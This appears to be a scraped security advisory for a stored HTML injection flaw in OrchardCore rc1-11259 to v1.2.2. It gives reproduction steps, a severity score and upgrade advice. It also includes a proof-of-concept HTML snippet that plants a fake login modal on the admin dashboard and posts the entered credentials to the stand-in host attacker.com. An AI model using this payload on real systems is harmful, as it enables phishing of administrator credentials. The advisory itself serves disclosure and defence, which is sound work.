We found results for “


Date: October 3, 2022


In OrchardCore rc1-11259 to v1.2.2 vulnerable to HTML injection, allow an authenticated user with an editor security role to inject a persistent HTML modal dialog component into the dashboard that will affect admin users.


Once an admin access the dashboard, the injected modal dialog will be presented (preventing access to any other element on the page) and wait for an input, once submitted - the admin will be redirected to a malicious host and the attacker will receive the confidential data (user’s credentials for instance)

PoC Details

1. Log in as an admin, navigate to security roles, and then edit the “Editor” role.
2. Then, enable the “Manage the Admin Dashboard” privilege.
3. Create a user with an “Editor” role and logout.
4. Login with the new user.
5. Once logged in, navigate to the Admin’s page (“/Admin” route).
6. Press on “Manage Dashboard” and edit a certain Widget (with an HTML editing capabilities).
7. Press on “<>” and add the following HTML code (There is a code section)
8. Click on “Publish”.
Yow will see that you are brought into the “/Admin” page, and cannot press on any other element. Type in non-confidential data, and press on “Login”. You will see that you are redirected into the attacker site. Also the credentials are sent to him.
9. Now, let’s login as an admin (since you can’t logout, route to “/login”).
10. Navigate to the Admin’s page (“/Admin” route). You will see the Modal dialog appear.

PoC Code

<div class="modal show d-block">
<div class="modal-dialog">
<div class="modal-content">
<div class="modal-header">
<h3 class="page-title">Please Log In</h3>
<div class="modal-body">
<form class="new-wiki-page" action="http://attacker.com/">
<div class="form-group">
<label for="username"><span>Username</span></label>
<input type="text" name="username" id="username" class="form-control">
<label for="password"><span>Password</span></label>
<input type="password" name="password" id="password" class="form-control">
<div class="form-actions"><button name="button" type="submit" class="btn btn-success">Login</button></div>

Affected Environments

OrchardCore versions rc1-11259 through v1.2.2


Upgrade to OrchardCore version v1.4.0

Language: C#

Good to know:


Cross-Site Scripting (XSS)


Upgrade Version

Upgrade to version OrchardCore.Infrastructure - 1.4.0

Learn More

Base Score:
Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): Low
User Interaction (UI): Required
Scope (S): Changed
Confidentiality (C): Low
Integrity (I): Low
Availability (A): None